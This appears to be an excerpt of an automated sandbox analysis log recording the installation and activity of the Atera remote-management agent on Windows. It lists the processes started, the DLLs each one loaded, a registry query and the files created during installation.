                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Windows\System32\cscript.exe cscript "C:\Program Files (x86)\Microsoft Office\Office16\ospp.vbs" /dstatus
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: unknown unknown
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeProcess created: unknown unknown
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknown
                                Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dll
                                Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dll
                                Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dll
                                Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dll
                                Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dll
                                Source: C:\Windows\System32\msiexec.exeSection loaded: srpapi.dll
                                Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dll
                                Source: C:\Windows\System32\msiexec.exeSection loaded: uxtheme.dll
                                Source: C:\Windows\System32\msiexec.exeSection loaded: textinputframework.dll
                                Source: C:\Windows\System32\msiexec.exeSection loaded: coreuicomponents.dll
                                Source: C:\Windows\System32\msiexec.exeSection loaded: coremessaging.dll
                                Source: C:\Windows\System32\msiexec.exeSection loaded: ntmarta.dll
                                Source: C:\Windows\System32\msiexec.exeSection loaded: wintypes.dll
                                Source: C:\Windows\System32\msiexec.exeSection loaded: windows.storage.dll
                                Source: C:\Windows\System32\msiexec.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: propsys.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: textshaping.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: netapi32.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: wkscli.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: msasn1.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: cryptsp.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: rsaenh.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: cryptbase.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: msisip.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: gpapi.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: version.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: mscoree.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: msihnd.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: pcacli.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: netapi32.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: wkscli.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: srclient.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: spp.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: powrprof.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: vssapi.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: vsstrace.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: umpdc.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: msasn1.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: cryptsp.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: rsaenh.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: cryptbase.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: msisip.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: gpapi.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: mscoree.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: version.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: rstrtmgr.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: ncrypt.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: ntasn1.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: pcacli.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: ntmarta.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: cabinet.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: mscoree.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: cabinet.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: mscoree.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: cabinet.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: mscoree.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: cabinet.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: mscoree.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: cabinet.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: winsta.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: mscoree.dllJump to behavior
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cabinet.dllJump to behavior
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cabinet.dllJump to behavior
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cabinet.dllJump to behavior
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cabinet.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: w32time.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: logoncli.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: vmictimeprovider.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dll
                                Source: C:\Windows\SysWOW64\net.exeSection loaded: mpr.dll
                                Source: C:\Windows\SysWOW64\net.exeSection loaded: wkscli.dll
                                Source: C:\Windows\SysWOW64\net.exeSection loaded: netutils.dll
                                Source: C:\Windows\SysWOW64\net.exeSection loaded: samcli.dll
                                Source: C:\Windows\SysWOW64\net.exeSection loaded: srvcli.dll
                                Source: C:\Windows\SysWOW64\net.exeSection loaded: iphlpapi.dll
                                Source: C:\Windows\SysWOW64\net1.exeSection loaded: samcli.dll
                                Source: C:\Windows\SysWOW64\net1.exeSection loaded: netutils.dll
                                Source: C:\Windows\SysWOW64\net1.exeSection loaded: dsrole.dll
                                Source: C:\Windows\SysWOW64\net1.exeSection loaded: srvcli.dll
                                Source: C:\Windows\SysWOW64\net1.exeSection loaded: wkscli.dll
                                Source: C:\Windows\SysWOW64\net1.exeSection loaded: logoncli.dll
                                Source: C:\Windows\SysWOW64\net1.exeSection loaded: cryptbase.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: version.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: mpr.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: framedynos.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: dbghelp.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: srvcli.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: netutils.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: wbemcomn.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: winsta.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: amsi.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: userenv.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: profapi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: mscoree.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: apphelp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: kernel.appcore.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: version.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: uxtheme.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: windows.storage.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: wldp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: profapi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: cryptsp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: rsaenh.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: cryptbase.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: urlmon.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: iertutil.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: srvcli.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: netutils.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: sspicli.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: propsys.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: msasn1.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: riched20.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: usp10.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: msls31.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: gpapi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: cryptnet.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: iphlpapi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: winnsi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: winhttp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: ondemandconnroutehelper.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: mswsock.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: dhcpcsvc6.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: dhcpcsvc.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: webio.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: dnsapi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: rasadhlp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: fwpuclnt.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: ondemandconnroutehelper.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: ondemandconnroutehelper.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: wbemcomn.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: amsi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: userenv.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: mscoree.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: kernel.appcore.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: version.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: windows.storage.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: wldp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: profapi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: cryptsp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: rsaenh.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: cryptbase.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: propsys.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: edputil.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: urlmon.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: iertutil.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: srvcli.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: netutils.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: windows.staterepositoryps.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: sspicli.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: wintypes.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: appresolver.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: bcp47langs.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: slc.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: userenv.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: sppc.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: onecorecommonproxystub.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: onecoreuapcommonproxystub.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: rasapi32.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: rasman.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: rtutils.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: mswsock.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: winhttp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: ondemandconnroutehelper.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: iphlpapi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: dhcpcsvc6.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: dhcpcsvc.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: dnsapi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: winnsi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: rasadhlp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: fwpuclnt.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: secur32.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: schannel.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: mskeyprotect.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: ntasn1.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: ncrypt.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: ncryptsslp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: msasn1.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: gpapi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: wbemcomn.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: amsi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: cryptnet.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: webio.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: cabinet.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: apphelp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: mscoree.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: apphelp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: kernel.appcore.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeSection loaded: dnsapi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeSection loaded: winnsi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeSection loaded: rasadhlp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeSection loaded: fwpuclnt.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeSection loaded: secur32.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeSection loaded: sspicli.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeSection loaded: schannel.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeSection loaded: mskeyprotect.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeSection loaded: ntasn1.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeSection loaded: ncrypt.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeSection loaded: ncryptsslp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeSection loaded: msasn1.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeSection loaded: gpapi.dll
                                Source: C:\Windows\System32\cscript.exeSection loaded: version.dll
                                Source: C:\Windows\System32\cscript.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\System32\cscript.exeSection loaded: sxs.dll
                                Source: C:\Windows\System32\cscript.exeSection loaded: vbscript.dll
                                Source: C:\Windows\System32\cscript.exeSection loaded: amsi.dll
                                Source: C:\Windows\System32\cscript.exeSection loaded: userenv.dll
                                Source: C:\Windows\System32\cscript.exeSection loaded: profapi.dll
                                Source: C:\Windows\System32\cscript.exeSection loaded: wldp.dll
                                Source: C:\Windows\System32\cscript.exeSection loaded: msasn1.dll
                                Source: C:\Windows\System32\cscript.exeSection loaded: cryptsp.dll
                                Source: C:\Windows\System32\cscript.exeSection loaded: rsaenh.dll
                                Source: C:\Windows\System32\cscript.exeSection loaded: cryptbase.dll
                                Source: C:\Windows\System32\cscript.exeSection loaded: msisip.dll
                                Source: C:\Windows\System32\cscript.exeSection loaded: wshext.dll
                                Source: C:\Windows\System32\cscript.exeSection loaded: scrobj.dll
                                Source: C:\Windows\System32\cscript.exeSection loaded: gpapi.dll
                                Source: C:\Windows\System32\cscript.exeSection loaded: cryptnet.dll
                                Source: C:\Windows\System32\cscript.exeSection loaded: iphlpapi.dll
                                Source: C:\Windows\System32\cscript.exeSection loaded: winnsi.dll
                                Source: C:\Windows\System32\cscript.exeSection loaded: mpr.dll
                                Source: C:\Windows\System32\cscript.exeSection loaded: scrrun.dll
                                Source: C:\Windows\System32\cscript.exeSection loaded: wbemcomn.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeSection loaded: mscoree.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeSection loaded: apphelp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeSection loaded: kernel.appcore.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeSection loaded: version.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\rundll32.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe; File written: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.ini
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe; File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: C:\Windows\System32\msiexec.exe; Directory created: C:\Program Files\ATERA Networks
Source: C:\Windows\System32\msiexec.exe; Directory created: C:\Program Files\ATERA Networks\AteraAgent
Source: C:\Windows\System32\msiexec.exe; Directory created: C:\Program Files\ATERA Networks\AteraAgent\AteraAgent.exe
Source: C:\Windows\System32\msiexec.exe; Directory created: C:\Program Files\ATERA Networks\AteraAgent\AteraAgent.exe.config
Source: C:\Windows\System32\msiexec.exe; Directory created: C:\Program Files\ATERA Networks\AteraAgent\BouncyCastle.Crypto.dll
Source: C:\Windows\System32\msiexec.exe; Directory created: C:\Program Files\ATERA Networks\AteraAgent\ICSharpCode.SharpZipLib.dll
Source: C:\Windows\System32\msiexec.exe; Directory created: C:\Program Files\ATERA Networks\AteraAgent\Newtonsoft.Json.dll
